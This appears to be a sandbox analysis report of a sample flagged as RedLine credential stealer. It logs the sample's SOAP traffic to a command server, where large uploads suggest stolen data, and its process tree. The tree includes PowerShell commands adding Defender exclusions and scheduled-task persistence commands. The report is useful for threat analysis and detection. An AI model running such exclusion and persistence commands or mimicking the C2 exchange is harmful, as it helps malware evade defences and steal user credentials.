                      Jul 3, 2024 18:17:24.270848036 CEST192.168.2.41.1.1.10xc60cStandard query (0)api.ip.sbA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 3, 2024 18:17:24.278146029 CEST1.1.1.1192.168.2.40xc60cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 185.222.58.91:55615

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449732185.222.58.91556157216C:\Users\user\Desktop\lZ8NRWShfC.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 18:17:17.773061037 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.58.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 3, 2024 18:17:18.348639965 CEST25INHTTP/1.1 100 Continue
                      Jul 3, 2024 18:17:18.482686996 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:18 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jul 3, 2024 18:17:23.546303988 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.58.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:23.850421906 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.58.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:24.139616966 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6512
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:24 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>40.94.25.3</b:string><b:string>40.94.25.57</b:string><b:string>40.94.31.16</b:string><b:string>40.94.31.12</b:string><b:string>36.99.136.136</b:string><b:string>69.55.5.249</b:string><b:string>20.99.160.173</b:string><b:string>34.28.87.190</b:string><b:string>34.17.55.59</b:string><b:string>40.73.35.80</b:string><b:string>222.98.34.226</b:string><b:string>217.111.63.60</b:string><b:string>154.61.71.50</b:string><b:string>154.61.71.50</b:string><b:string>206.81.11.221</b:string><b:string>95.174.64.244</b:string><b:string>128.90.60.21</b:string><b:string>149.22.81.101</b:string><b:string>103.27 [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449734185.222.58.91556157608C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 18:17:27.048851967 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.58.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 3, 2024 18:17:27.637227058 CEST25INHTTP/1.1 100 Continue
                      Jul 3, 2024 18:17:27.766546011 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:26 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jul 3, 2024 18:17:32.827147961 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.58.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:32.997888088 CEST25INHTTP/1.1 100 Continue
                      Jul 3, 2024 18:17:33.197269917 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6512
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:32 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>40.94.25.3</b:string><b:string>40.94.25.57</b:string><b:string>40.94.31.16</b:string><b:string>40.94.31.12</b:string><b:string>36.99.136.136</b:string><b:string>69.55.5.249</b:string><b:string>20.99.160.173</b:string><b:string>34.28.87.190</b:string><b:string>34.17.55.59</b:string><b:string>40.73.35.80</b:string><b:string>222.98.34.226</b:string><b:string>217.111.63.60</b:string><b:string>154.61.71.50</b:string><b:string>154.61.71.50</b:string><b:string>206.81.11.221</b:string><b:string>95.174.64.244</b:string><b:string>128.90.60.21</b:string><b:string>149.22.81.101</b:string><b:string>103.27 [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449735185.222.58.91556157216C:\Users\user\Desktop\lZ8NRWShfC.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 18:17:27.241832018 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.58.91:55615
                      Content-Length: 925603
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:28.761116982 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:28 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Jul 3, 2024 18:17:28.763891935 CEST217OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.58.91:55615
                      Content-Length: 925595
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:29.499789000 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:28 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449743185.222.58.91556157608C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 18:17:35.929763079 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.58.91:55615
                      Content-Length: 925089
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 3, 2024 18:17:37.401113033 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:37 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449744185.222.58.91556157608C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      TimestampBytes transferredDirectionData
                      Jul 3, 2024 18:17:37.409738064 CEST241OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.58.91:55615
                      Content-Length: 925081
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 3, 2024 18:17:38.893376112 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Wed, 03 Jul 2024 16:17:38 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:17:08
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\lZ8NRWShfC.exe"
                      Imagebase:0xb60000
                      File size:730'120 bytes
                      MD5 hash:3599FA63D78413242A88966D3B4B14EF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                      Imagebase:0x2d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                      Imagebase:0x2d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp"
                      Imagebase:0x7ff7699e0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:12:17:14
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:12:17:15
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\lZ8NRWShfC.exe"
                      Imagebase:0x190000
                      File size:730'120 bytes
                      MD5 hash:3599FA63D78413242A88966D3B4B14EF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:8
                      Start time:12:17:15
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\lZ8NRWShfC.exe"
                      Imagebase:0x6a0000
                      File size:730'120 bytes
                      MD5 hash:3599FA63D78413242A88966D3B4B14EF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:12:17:15
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:10
                      Start time:12:17:16
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      Imagebase:0xf00000
                      File size:730'120 bytes
                      MD5 hash:3599FA63D78413242A88966D3B4B14EF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 68%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:11
                      Start time:12:17:17
                      Start date:03/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff693ab0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:12:17:24
                      Start date:03/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp"
                      Imagebase:0x2d0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:12:17:24
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:12:17:24
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                      Imagebase:0x870000
                      File size:730'120 bytes
                      MD5 hash:3599FA63D78413242A88966D3B4B14EF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:15
                      Start time:12:17:24
                      Start date:03/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:11.4%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:1.7%
                        Total number of Nodes:176
                        Total number of Limit Nodes:10
